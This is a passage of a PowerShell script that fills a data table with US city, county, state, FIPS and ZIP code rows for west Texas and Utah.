$null = $Cities.Rows.Add("Denver city","Yoakum","Texas","TX","48","79323") + $null = $Cities.Rows.Add("Enochs","Bailey","Texas","TX","48","79324") + $null = $Cities.Rows.Add("Farwell","Parmer","Texas","TX","48","79325") + $null = $Cities.Rows.Add("Fieldton","Lamb","Texas","TX","48","79326") + $null = $Cities.Rows.Add("Idalou","Lubbock","Texas","TX","48","79329") + $null = $Cities.Rows.Add("Justiceburg","Garza","Texas","TX","48","79330") + $null = $Cities.Rows.Add("Lamesa","Dawson","Texas","TX","48","79331") + $null = $Cities.Rows.Add("Levelland","Hockley","Texas","TX","48","79336") + $null = $Cities.Rows.Add("Littlefield","Lamb","Texas","TX","48","79339") + $null = $Cities.Rows.Add("Loop","Gaines","Texas","TX","48","79342") + $null = $Cities.Rows.Add("Lorenzo","Crosby","Texas","TX","48","79343") + $null = $Cities.Rows.Add("Maple","Bailey","Texas","TX","48","79344") + $null = $Cities.Rows.Add("Meadow","Terry","Texas","TX","48","79345") + $null = $Cities.Rows.Add("Morton","Cochran","Texas","TX","48","79346") + $null = $Cities.Rows.Add("Muleshoe","Bailey","Texas","TX","48","79347") + $null = $Cities.Rows.Add("New deal","Lubbock","Texas","TX","48","79350") + $null = $Cities.Rows.Add("Odonnell","Lynn","Texas","TX","48","79351") + $null = $Cities.Rows.Add("Pep","Hockley","Texas","TX","48","79353") + $null = $Cities.Rows.Add("Plains","Yoakum","Texas","TX","48","79355") + $null = $Cities.Rows.Add("Post","Garza","Texas","TX","48","79356") + $null = $Cities.Rows.Add("Cone","Crosby","Texas","TX","48","79357") + $null = $Cities.Rows.Add("Ropesville","Hockley","Texas","TX","48","79358") + $null = $Cities.Rows.Add("Seagraves","Gaines","Texas","TX","48","79359") + $null = $Cities.Rows.Add("Seminole","Gaines","Texas","TX","48","79360") + $null = $Cities.Rows.Add("Shallowater","Lubbock","Texas","TX","48","79363") + $null = $Cities.Rows.Add("Ransom canyon","Lubbock","Texas","TX","48","79364") + $null = $Cities.Rows.Add("Ransom canyon","Lubbock","Texas","TX","48","79366") + $null = $Cities.Rows.Add("Smyer","Hockley","Texas","TX","48","79367") + $null = $Cities.Rows.Add("Spade","Lamb","Texas","TX","48","79369") + $null = $Cities.Rows.Add("Spur","Dickens","Texas","TX","48","79370") + $null = $Cities.Rows.Add("Sudan","Lamb","Texas","TX","48","79371") + $null = $Cities.Rows.Add("Sundown","Hockley","Texas","TX","48","79372") + $null = $Cities.Rows.Add("Tahoka","Lynn","Texas","TX","48","79373") + $null = $Cities.Rows.Add("Tokio","Yoakum","Texas","TX","48","79376") + $null = $Cities.Rows.Add("Welch","Dawson","Texas","TX","48","79377") + $null = $Cities.Rows.Add("Wellman","Terry","Texas","TX","48","79378") + $null = $Cities.Rows.Add("Whiteface","Cochran","Texas","TX","48","79379") + $null = $Cities.Rows.Add("Whitharral","Hockley","Texas","TX","48","79380") + $null = $Cities.Rows.Add("Wilson","Lynn","Texas","TX","48","79381") + $null = $Cities.Rows.Add("Wolfforth","Lubbock","Texas","TX","48","79382") + $null = $Cities.Rows.Add("New home","Lynn","Texas","TX","48","79383") + $null = $Cities.Rows.Add("Zcta 793hh","Crosby","Texas","TX","48","793HH") + $null = $Cities.Rows.Add("Zcta 793xx","Lamb","Texas","TX","48","793XX") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79401") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79403") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79404") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79405") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79406") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79407") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79410") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79411") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79412") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79413") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79414") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79415") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79416") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79423") + $null = $Cities.Rows.Add("Lubbock","Lubbock","Texas","TX","48","79424") + $null = $Cities.Rows.Add("Anson","Jones","Texas","TX","48","79501") + $null = $Cities.Rows.Add("Aspermont","Stonewall","Texas","TX","48","79502") + $null = $Cities.Rows.Add("Avoca","Jones","Texas","TX","48","79503") + $null = $Cities.Rows.Add("Baird","Callahan","Texas","TX","48","79504") + $null = $Cities.Rows.Add("Benjamin","Knox","Texas","TX","48","79505") + $null = $Cities.Rows.Add("Blackwell","Nolan","Texas","TX","48","79506") + $null = $Cities.Rows.Add("Buffalo gap","Taylor","Texas","TX","48","79508") + $null = $Cities.Rows.Add("Clyde","Callahan","Texas","TX","48","79510") + $null = $Cities.Rows.Add("Coahoma","Howard","Texas","TX","48","79511") + $null = $Cities.Rows.Add("Colorado city","Mitchell","Texas","TX","48","79512") + $null = $Cities.Rows.Add("Fluvanna","Scurry","Texas","TX","48","79517") + $null = $Cities.Rows.Add("Girard","Kent","Texas","TX","48","79518") + $null = $Cities.Rows.Add("Goldsboro","Coleman","Texas","TX","48","79519") + $null = $Cities.Rows.Add("Hamlin","Jones","Texas","TX","48","79520") + $null = $Cities.Rows.Add("Haskell","Haskell","Texas","TX","48","79521") + $null = $Cities.Rows.Add("Hawley","Jones","Texas","TX","48","79525") + $null = $Cities.Rows.Add("Hermleigh","Scurry","Texas","TX","48","79526") + $null = $Cities.Rows.Add("Ira","Scurry","Texas","TX","48","79527") + $null = $Cities.Rows.Add("Jayton","Kent","Texas","TX","48","79528") + $null = $Cities.Rows.Add("Knox city","Knox","Texas","TX","48","79529") + $null = $Cities.Rows.Add("Lawn","Taylor","Texas","TX","48","79530") + $null = $Cities.Rows.Add("Loraine","Mitchell","Texas","TX","48","79532") + $null = $Cities.Rows.Add("Lueders","Jones","Texas","TX","48","79533") + $null = $Cities.Rows.Add("Mc caulley","Fisher","Texas","TX","48","79534") + $null = $Cities.Rows.Add("Maryneal","Nolan","Texas","TX","48","79535") + $null = $Cities.Rows.Add("Merkel","Taylor","Texas","TX","48","79536") + $null = $Cities.Rows.Add("Nolan","Nolan","Texas","TX","48","79537") + $null = $Cities.Rows.Add("Novice","Coleman","Texas","TX","48","79538") + $null = $Cities.Rows.Add("O brien","Haskell","Texas","TX","48","79539") + $null = $Cities.Rows.Add("Old glory","Stonewall","Texas","TX","48","79540") + $null = $Cities.Rows.Add("Ovalo","Taylor","Texas","TX","48","79541") + $null = $Cities.Rows.Add("Roby","Fisher","Texas","TX","48","79543") + $null = $Cities.Rows.Add("Rochester","Haskell","Texas","TX","48","79544") + $null = $Cities.Rows.Add("Roscoe","Nolan","Texas","TX","48","79545") + $null = $Cities.Rows.Add("Rotan","Fisher","Texas","TX","48","79546") + $null = $Cities.Rows.Add("Rule","Haskell","Texas","TX","48","79547") + $null = $Cities.Rows.Add("Sagerton","Haskell","Texas","TX","48","79548") + $null = $Cities.Rows.Add("Dermott","Scurry","Texas","TX","48","79549") + $null = $Cities.Rows.Add("Stamford","Jones","Texas","TX","48","79553") + $null = $Cities.Rows.Add("Sweetwater","Nolan","Texas","TX","48","79556") + $null = $Cities.Rows.Add("Sylvester","Fisher","Texas","TX","48","79560") + $null = $Cities.Rows.Add("Trent","Taylor","Texas","TX","48","79561") + $null = $Cities.Rows.Add("Tuscola","Taylor","Texas","TX","48","79562") + $null = $Cities.Rows.Add("Tye","Taylor","Texas","TX","48","79563") + $null = $Cities.Rows.Add("Westbrook","Mitchell","Texas","TX","48","79565") + $null = $Cities.Rows.Add("Wingate","Runnels","Texas","TX","48","79566") + $null = $Cities.Rows.Add("Winters","Runnels","Texas","TX","48","79567") + $null = $Cities.Rows.Add("Zcta 795hh","Borden","Texas","TX","48","795HH") + $null = $Cities.Rows.Add("Zcta 795xx","Borden","Texas","TX","48","795XX") + $null = $Cities.Rows.Add("Abilene","Taylor","Texas","TX","48","79601") + $null = $Cities.Rows.Add("Abilene","Taylor","Texas","TX","48","79602") + $null = $Cities.Rows.Add("Abilene","Taylor","Texas","TX","48","79603") + $null = $Cities.Rows.Add("Abilene","Taylor","Texas","TX","48","79605") + $null = $Cities.Rows.Add("Abilene","Taylor","Texas","TX","48","79606") + $null = $Cities.Rows.Add("Dyess afb","Taylor","Texas","TX","48","79607") + $null = $Cities.Rows.Add("Zcta 796xx","Shackelford","Texas","TX","48","796XX") + $null = $Cities.Rows.Add("Midland","Midland","Texas","TX","48","79701") + $null = $Cities.Rows.Add("Midland","Midland","Texas","TX","48","79703") + $null = $Cities.Rows.Add("Midland","Midland","Texas","TX","48","79705") + $null = $Cities.Rows.Add("Midland","Midland","Texas","TX","48","79706") + $null = $Cities.Rows.Add("Midland","Midland","Texas","TX","48","79707") + $null = $Cities.Rows.Add("Ackerly","Martin","Texas","TX","48","79713") + $null = $Cities.Rows.Add("Andrews","Andrews","Texas","TX","48","79714") + $null = $Cities.Rows.Add("Balmorhea","Reeves","Texas","TX","48","79718") + $null = $Cities.Rows.Add("Barstow","Ward","Texas","TX","48","79719") + $null = $Cities.Rows.Add("Vealmoor","Howard","Texas","TX","48","79720") + $null = $Cities.Rows.Add("Coyanosa","Pecos","Texas","TX","48","79730") + $null = $Cities.Rows.Add("Crane","Crane","Texas","TX","48","79731") + $null = $Cities.Rows.Add("Forsan","Howard","Texas","TX","48","79733") + $null = $Cities.Rows.Add("Fort davis","Jeff Davis","Texas","TX","48","79734") + $null = $Cities.Rows.Add("Fort stockton","Pecos","Texas","TX","48","79735") + $null = $Cities.Rows.Add("Gail","Borden","Texas","TX","48","79738") + $null = $Cities.Rows.Add("Garden city","Glasscock","Texas","TX","48","79739") + $null = $Cities.Rows.Add("Girvin","Pecos","Texas","TX","48","79740") + $null = $Cities.Rows.Add("Goldsmith","Ector","Texas","TX","48","79741") + $null = $Cities.Rows.Add("Grandfalls","Ward","Texas","TX","48","79742") + $null = $Cities.Rows.Add("Imperial","Pecos","Texas","TX","48","79743") + $null = $Cities.Rows.Add("Iraan","Pecos","Texas","TX","48","79744") + $null = $Cities.Rows.Add("Kermit","Winkler","Texas","TX","48","79745") + $null = $Cities.Rows.Add("Knott","Howard","Texas","TX","48","79748") + $null = $Cities.Rows.Add("Lenorah","Martin","Texas","TX","48","79749") + $null = $Cities.Rows.Add("Mc camey","Upton","Texas","TX","48","79752") + $null = $Cities.Rows.Add("Mentone","Loving","Texas","TX","48","79754") + $null = $Cities.Rows.Add("Midkiff","Upton","Texas","TX","48","79755") + $null = $Cities.Rows.Add("Monahans","Ward","Texas","TX","48","79756") + $null = $Cities.Rows.Add("Gardendale","Ector","Texas","TX","48","79758") + $null = $Cities.Rows.Add("Notrees","Ector","Texas","TX","48","79759") + $null = $Cities.Rows.Add("Odessa","Ector","Texas","TX","48","79761") + $null = $Cities.Rows.Add("Odessa","Ector","Texas","TX","48","79762") + $null = $Cities.Rows.Add("Odessa","Ector","Texas","TX","48","79763") + $null = $Cities.Rows.Add("Odessa","Ector","Texas","TX","48","79764") + $null = $Cities.Rows.Add("Odessa","Ector","Texas","TX","48","79765") + $null = $Cities.Rows.Add("Odessa","Ector","Texas","TX","48","79766") + $null = $Cities.Rows.Add("Verhalen","Reeves","Texas","TX","48","79772") + $null = $Cities.Rows.Add("Penwell","Ector","Texas","TX","48","79776") + $null = $Cities.Rows.Add("Pyote","Ward","Texas","TX","48","79777") + $null = $Cities.Rows.Add("Rankin","Upton","Texas","TX","48","79778") + $null = $Cities.Rows.Add("Saragosa","Reeves","Texas","TX","48","79780") + $null = $Cities.Rows.Add("Sheffield","Pecos","Texas","TX","48","79781") + $null = $Cities.Rows.Add("Stanton","Martin","Texas","TX","48","79782") + $null = $Cities.Rows.Add("Tarzan","Martin","Texas","TX","48","79783") + $null = $Cities.Rows.Add("Toyah","Reeves","Texas","TX","48","79785") + $null = $Cities.Rows.Add("Wickett","Ward","Texas","TX","48","79788") + $null = $Cities.Rows.Add("Wink","Winkler","Texas","TX","48","79789") + $null = $Cities.Rows.Add("Zcta 797hh","Loving","Texas","TX","48","797HH") + $null = $Cities.Rows.Add("Zcta 797xx","Martin","Texas","TX","48","797XX") + $null = $Cities.Rows.Add("Anthony","El Paso","Texas","TX","48","79821") + $null = $Cities.Rows.Add("Alpine","Brewster","Texas","TX","48","79830") + $null = $Cities.Rows.Add("Alpine","Brewster","Texas","TX","48","79831") + $null = $Cities.Rows.Add("Big bend nationa","Brewster","Texas","TX","48","79834") + $null = $Cities.Rows.Add("Canutillo","El Paso","Texas","TX","48","79835") + $null = $Cities.Rows.Add("Clint","El Paso","Texas","TX","48","79836") + $null = $Cities.Rows.Add("Dell city","Hudspeth","Texas","TX","48","79837") + $null = $Cities.Rows.Add("Fabens","El Paso","Texas","TX","48","79838") + $null = $Cities.Rows.Add("Fort hancock","Hudspeth","Texas","TX","48","79839") + $null = $Cities.Rows.Add("Marathon","Brewster","Texas","TX","48","79842") + $null = $Cities.Rows.Add("Marfa","Presidio","Texas","TX","48","79843") + $null = $Cities.Rows.Add("Presidio","Presidio","Texas","TX","48","79845") + $null = $Cities.Rows.Add("Redford","Presidio","Texas","TX","48","79846") + $null = $Cities.Rows.Add("Salt flat","Hudspeth","Texas","TX","48","79847") + $null = $Cities.Rows.Add("Sanderson","Terrell","Texas","TX","48","79848") + $null = $Cities.Rows.Add("San elizario","El Paso","Texas","TX","48","79849") + $null = $Cities.Rows.Add("Sierra blanca","Hudspeth","Texas","TX","48","79851") + $null = $Cities.Rows.Add("Terlingua","Brewster","Texas","TX","48","79852") + $null = $Cities.Rows.Add("Tornillo","El Paso","Texas","TX","48","79853") + $null = $Cities.Rows.Add("Valentine","Jeff Davis","Texas","TX","48","79854") + $null = $Cities.Rows.Add("Kent","Culberson","Texas","TX","48","79855") + $null = $Cities.Rows.Add("Zcta 798xx","El Paso","Texas","TX","48","798XX") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79901") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79902") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79903") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79904") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79905") + $null = $Cities.Rows.Add("Fort bliss","El Paso","Texas","TX","48","79906") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79907") + $null = $Cities.Rows.Add("Fort bliss","El Paso","Texas","TX","48","79908") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79912") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79915") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79922") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79924") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79925") + $null = $Cities.Rows.Add("Horizon city","El Paso","Texas","TX","48","79927") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79930") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79932") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79934") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79935") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79936") + $null = $Cities.Rows.Add("El paso","El Paso","Texas","TX","48","79938") + $null = $Cities.Rows.Add("Zcta 799xx","Hudspeth","Texas","TX","48","799XX") + $null = $Cities.Rows.Add("","Oldham","Texas","TX","48","884XX") + $null = $Cities.Rows.Add("Altamont","Duchesne","Utah","UT","49","84001") + $null = $Cities.Rows.Add("Altonah","Duchesne","Utah","UT","49","84002") + $null = $Cities.Rows.Add("American fork","Utah","Utah","UT","49","84003") + $null = $Cities.Rows.Add("Alpine","Utah","Utah","UT","49","84004") + $null = $Cities.Rows.Add("Bingham canyon","Salt Lake","Utah","UT","49","84006") + $null = $Cities.Rows.Add("Bluebell","Duchesne","Utah","UT","49","84007") + $null = $Cities.Rows.Add("Bountiful","Davis","Utah","UT","49","84010") + $null = $Cities.Rows.Add("Cedar valley","Utah","Utah","UT","49","84013") + $null = $Cities.Rows.Add("Centerville","Davis","Utah","UT","49","84014") + $null = $Cities.Rows.Add("Clearfield","Davis","Utah","UT","49","84015") + $null = $Cities.Rows.Add("Coalville","Summit","Utah","UT","49","84017") + $null = $Cities.Rows.Add("Croydon","Morgan","Utah","UT","49","84018") + $null = $Cities.Rows.Add("Draper","Salt Lake","Utah","UT","49","84020") + $null = $Cities.Rows.Add("Duchesne","Duchesne","Utah","UT","49","84021") + $null = $Cities.Rows.Add("Dugway","Tooele","Utah","UT","49","84022") + $null = $Cities.Rows.Add("Dutch john","Daggett","Utah","UT","49","84023") + $null = $Cities.Rows.Add("Echo","Summit","Utah","UT","49","84024") + $null = $Cities.Rows.Add("Farmington","Davis","Utah","UT","49","84025") + $null = $Cities.Rows.Add("Fort duchesne","Uintah","Utah","UT","49","84026") + $null = $Cities.Rows.Add("Fruitland","Duchesne","Utah","UT","49","84027") + $null = $Cities.Rows.Add("Garden city","Rich","Utah","UT","49","84028") + $null = $Cities.Rows.Add("Grantsville","Tooele","Utah","UT","49","84029") + $null = $Cities.Rows.Add("Hanna","Duchesne","Utah","UT","49","84031") + $null = $Cities.Rows.Add("Heber city","Wasatch","Utah","UT","49","84032") + $null = $Cities.Rows.Add("Henefer","Summit","Utah","UT","49","84033") + $null = $Cities.Rows.Add("Ibapah","Tooele","Utah","UT","49","84034") + $null = $Cities.Rows.Add("Jensen","Uintah","Utah","UT","49","84035") + $null = $Cities.Rows.Add("Kamas","Summit","Utah","UT","49","84036") + $null = $Cities.Rows.Add("Kaysville","Davis","Utah","UT","49","84037") + $null = $Cities.Rows.Add("Laketown","Rich","Utah","UT","49","84038") + $null = $Cities.Rows.Add("Lapoint","Uintah","Utah","UT","49","84039") + $null = $Cities.Rows.Add("Layton","Davis","Utah","UT","49","84040") + $null = $Cities.Rows.Add("Layton","Davis","Utah","UT","49","84041") + $null = $Cities.Rows.Add("Lindon","Utah","Utah","UT","49","84042") + $null = $Cities.Rows.Add("Lehi","Utah","Utah","UT","49","84043") + $null = $Cities.Rows.Add("Magna","Salt Lake","Utah","UT","49","84044") + $null = $Cities.Rows.Add("Manila","Daggett","Utah","UT","49","84046") + $null = $Cities.Rows.Add("Midvale","Salt Lake","Utah","UT","49","84047") + $null = $Cities.Rows.Add("Midway","Wasatch","Utah","UT","49","84049") + $null = $Cities.Rows.Add("Morgan","Morgan","Utah","UT","49","84050") + $null = $Cities.Rows.Add("Mountain home","Duchesne","Utah","UT","49","84051") + $null = $Cities.Rows.Add("Myton","Duchesne","Utah","UT","49","84052") + $null = $Cities.Rows.Add("Neola","Duchesne","Utah","UT","49","84053") + $null = $Cities.Rows.Add("North salt lake","Davis","Utah","UT","49","84054") + $null = $Cities.Rows.Add("Oakley","Summit","Utah","UT","49","84055") + $null = $Cities.Rows.Add("Hill air force b","Davis","Utah","UT","49","84056") + $null = $Cities.Rows.Add("Orem","Utah","Utah","UT","49","84057") + $null = $Cities.Rows.Add("Vineyard","Utah","Utah","UT","49","84058") + $null = $Cities.Rows.Add("Park city","Summit","Utah","UT","49","84060") + $null = $Cities.Rows.Add("Peoa","Summit","Utah","UT","49","84061") + $null = $Cities.Rows.Add("Pleasant grove","Utah","Utah","UT","49","84062") + $null = $Cities.Rows.Add("Randlett","Uintah","Utah","UT","49","84063") + $null = $Cities.Rows.Add("Randolph","Rich","Utah","UT","49","84064") + $null = $Cities.Rows.Add("Lark","Salt Lake","Utah","UT","49","84065") + $null = $Cities.Rows.Add("Roosevelt","Duchesne","Utah","UT","49","84066") + $null = $Cities.Rows.Add("Roy","Weber","Utah","UT","49","84067") + $null = $Cities.Rows.Add("Rush valley","Tooele","Utah","UT","49","84069") + $null = $Cities.Rows.Add("Sandy","Salt Lake","Utah","UT","49","84070") + $null = $Cities.Rows.Add("Stockton","Tooele","Utah","UT","49","84071") + $null = $Cities.Rows.Add("Tabiona","Duchesne","Utah","UT","49","84072") + $null = $Cities.Rows.Add("Talmage","Duchesne","Utah","UT","49","84073") + $null = $Cities.Rows.Add("Tooele","Tooele","Utah","UT","49","84074") + $null = $Cities.Rows.Add("Syracuse","Davis","Utah","UT","49","84075") + $null = $Cities.Rows.Add("Tridell","Uintah","Utah","UT","49","84076") + $null = $Cities.Rows.Add("Vernal","Uintah","Utah","UT","49","84078") + $null = $Cities.Rows.Add("Vernon","Tooele","Utah","UT","49","84080") + $null = $Cities.Rows.Add("Wallsburg","Wasatch","Utah","UT","49","84082") + $null = $Cities.Rows.Add("Trout creek","Tooele","Utah","UT","49","84083") + $null = $Cities.Rows.Add("West jordan","Salt Lake","Utah","UT","49","84084") + $null = $Cities.Rows.Add("Whiterocks","Uintah","Utah","UT","49","84085") + $null = $Cities.Rows.Add("Woodruff","Rich","Utah","UT","49","84086") + $null = $Cities.Rows.Add("Woods cross","Davis","Utah","UT","49","84087") + $null = $Cities.Rows.Add("West jordan","Salt Lake","Utah","UT","49","84088") + $null = $Cities.Rows.Add("Alta","Salt Lake","Utah","UT","49","84092") + $null = $Cities.Rows.Add("Sandy","Salt Lake","Utah","UT","49","84093") + $null = $Cities.Rows.Add("Sandy","Salt Lake","Utah","UT","49","84094") + $null = $Cities.Rows.Add("South jordan","Salt Lake","Utah","UT","49","84095") + $null = $Cities.Rows.Add("Zcta 84097","Utah","Utah","UT","49","84097") + $null = $Cities.Rows.Add("Zcta 84098","Summit","Utah","UT","49","84098") + $null = $Cities.Rows.Add("Zcta 840hh","Daggett","Utah","UT","49","840HH") + $null = $Cities.Rows.Add("Zcta 840xx","Summit","Utah","UT","49","840XX") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84101") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84102") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84103") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84104") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84105") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84106") + $null = $Cities.Rows.Add("Murray","Salt Lake","Utah","UT","49","84107") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84108") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84109") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84111") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84112") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84113") + $null = $Cities.Rows.Add("South salt lake","Salt Lake","Utah","UT","49","84115") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84116") + $null = $Cities.Rows.Add("Holladay","Salt Lake","Utah","UT","49","84117") + $null = $Cities.Rows.Add("Kearns","Salt Lake","Utah","UT","49","84118") + $null = $Cities.Rows.Add("West valley city","Salt Lake","Utah","UT","49","84119") + $null = $Cities.Rows.Add("West valley city","Salt Lake","Utah","UT","49","84120") + $null = $Cities.Rows.Add("Cottonwood","Salt Lake","Utah","UT","49","84121") + $null = $Cities.Rows.Add("Murray","Salt Lake","Utah","UT","49","84123") + $null = $Cities.Rows.Add("Holladay","Salt Lake","Utah","UT","49","84124") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84128") + $null = $Cities.Rows.Add("Salt lake city","Salt Lake","Utah","UT","49","84180") + $null = $Cities.Rows.Add("Zcta 841hh","Salt Lake","Utah","UT","49","841HH") + $null = $Cities.Rows.Add("Zcta 841xx","Salt Lake","Utah","UT","49","841XX") + $null = $Cities.Rows.Add("Bear river city","Box Elder","Utah","UT","49","84301") + $null = $Cities.Rows.Add("Brigham city","Box Elder","Utah","UT","49","84302") + $null = $Cities.Rows.Add("Cache junction","Cache","Utah","UT","49","84304") + $null = $Cities.Rows.Add("Clarkston","Cache","Utah","UT","49","84305") + $null = $Cities.Rows.Add("Collinston","Box Elder","Utah","UT","49","84306") + $null = $Cities.Rows.Add("Corinne","Box Elder","Utah","UT","49","84307") + $null = $Cities.Rows.Add("Deweyville","Box Elder","Utah","UT","49","84309") + $null = $Cities.Rows.Add("Eden","Weber","Utah","UT","49","84310") + $null = $Cities.Rows.Add("Fielding","Box Elder","Utah","UT","49","84311") + $null = $Cities.Rows.Add("Garland","Box Elder","Utah","UT","49","84312") + $null = $Cities.Rows.Add("Grouse creek","Box Elder","Utah","UT","49","84313") + $null = $Cities.Rows.Add("Honeyville","Box Elder","Utah","UT","49","84314") + $null = $Cities.Rows.Add("Hooper","Weber","Utah","UT","49","84315") + $null = $Cities.Rows.Add("Howell","Box Elder","Utah","UT","49","84316") + $null = $Cities.Rows.Add("Huntsville","Weber","Utah","UT","49","84317") + $null = $Cities.Rows.Add("Hyde park","Cache","Utah","UT","49","84318") + $null = $Cities.Rows.Add("Hyrum","Cache","Utah","UT","49","84319") + $null = $Cities.Rows.Add("Lewiston","Cache","Utah","UT","49","84320") + $null = $Cities.Rows.Add("Logan","Cache","Utah","UT","49","84321") + $null = $Cities.Rows.Add("Mantua","Box Elder","Utah","UT","49","84324") + $null = $Cities.Rows.Add("Mendon","Cache","Utah","UT","49","84325") + $null = $Cities.Rows.Add("Millville","Cache","Utah","UT","49","84326") + $null = $Cities.Rows.Add("Newton","Cache","Utah","UT","49","84327") + $null = $Cities.Rows.Add("Paradise","Cache","Utah","UT","49","84328") + $null = $Cities.Rows.Add("Park valley","Box Elder","Utah","UT","49","84329") + $null = $Cities.Rows.Add("Plymouth","Box Elder","Utah","UT","49","84330") + $null = $Cities.Rows.Add("Portage","Box Elder","Utah","UT","49","84331") + $null = $Cities.Rows.Add("Providence","Cache","Utah","UT","49","84332") + $null = $Cities.Rows.Add("Richmond","Cache","Utah","UT","49","84333") + $null = $Cities.Rows.Add("Riverside","Box Elder","Utah","UT","49","84334") + $null = $Cities.Rows.Add("Smithfield","Cache","Utah","UT","49","84335") + $null = $Cities.Rows.Add("Snowville","Box Elder","Utah","UT","49","84336") + $null = $Cities.Rows.Add("Tremonton","Box Elder","Utah","UT","49","84337") + $null = $Cities.Rows.Add("Trenton","Cache","Utah","UT","49","84338") + $null = $Cities.Rows.Add("Wellsville","Cache","Utah","UT","49","84339") + $null = $Cities.Rows.Add("Willard","Box Elder","Utah","UT","49","84340") + $null = $Cities.Rows.Add("Zcta 84341","Cache","Utah","UT","49","84341") + $null = $Cities.Rows.Add("Zcta 843hh","Box Elder","Utah","UT","49","843HH") + $null = $Cities.Rows.Add("Zcta 843xx","Weber","Utah","UT","49","843XX") + $null = $Cities.Rows.Add("Ogden","Weber","Utah","UT","49","84401") + $null = $Cities.Rows.Add("Ogden","Weber","Utah","UT","49","84403") + $null = $Cities.Rows.Add("Ogden","Weber","Utah","UT","49","84404") + $null = $Cities.Rows.Add("Ogden","Weber","Utah","UT","49","84405") + $null = $Cities.Rows.Add("Ogden","Weber","Utah","UT","49","84414") + $null = $Cities.Rows.Add("Zcta 844hh","Weber","Utah","UT","49","844HH") + $null = $Cities.Rows.Add("Price","Carbon","Utah","UT","49","84501") + $null = $Cities.Rows.Add("Aneth","San Juan","Utah","UT","49","84510") + $null = $Cities.Rows.Add("Blanding","San Juan","Utah","UT","49","84511") + $null = $Cities.Rows.Add("Bluff","San Juan","Utah","UT","49","84512") + $null = $Cities.Rows.Add("Castle dale","Emery","Utah","UT","49","84513") + $null = $Cities.Rows.Add("Clawson","Emery","Utah","UT","49","84516") + $null = $Cities.Rows.Add("Cleveland","Emery","Utah","UT","49","84518") + $null = $Cities.Rows.Add("East carbon","Carbon","Utah","UT","49","84520") + $null = $Cities.Rows.Add("Elmo","Emery","Utah","UT","49","84521") + $null = $Cities.Rows.Add("Emery","Emery","Utah","UT","49","84522") + $null = $Cities.Rows.Add("Ferron","Emery","Utah","UT","49","84523") + $null = $Cities.Rows.Add("Green river","Emery","Utah","UT","49","84525") + $null = $Cities.Rows.Add("Helper","Carbon","Utah","UT","49","84526") + $null = $Cities.Rows.Add("Huntington","Emery","Utah","UT","49","84528") + $null = $Cities.Rows.Add("Kenilworth","Carbon","Utah","UT","49","84529") + $null = $Cities.Rows.Add("La sal","San Juan","Utah","UT","49","84530") + $null = $Cities.Rows.Add("Mexican hat","San Juan","Utah","UT","49","84531") + $null = $Cities.Rows.Add("Moab","Grand","Utah","UT","49","84532") + $null = $Cities.Rows.Add("Bullfrog","San Juan","Utah","UT","49","84533") + $null = $Cities.Rows.Add("Montezuma creek","San Juan","Utah","UT","49","84534") + $null = $Cities.Rows.Add("Monticello","San Juan","Utah","UT","49","84535") + $null = $Cities.Rows.Add("Monument valley","San Juan","Utah","UT","49","84536") + $null = $Cities.Rows.Add("Orangeville","Emery","Utah","UT","49","84537") + $null = $Cities.Rows.Add("Sunnyside","Carbon","Utah","UT","49","84539") + $null = $Cities.Rows.Add("Thompson","Grand","Utah","UT","49","84540") + $null = $Cities.Rows.Add("Wellington","Carbon","Utah","UT","49","84542") + $null = $Cities.Rows.Add("Zcta 845hh","Emery","Utah","UT","49","845HH") + $null = $Cities.Rows.Add("Provo","Utah","Utah","UT","49","84601") + $null = $Cities.Rows.Add("Provo","Utah","Utah","UT","49","84604") + $null = 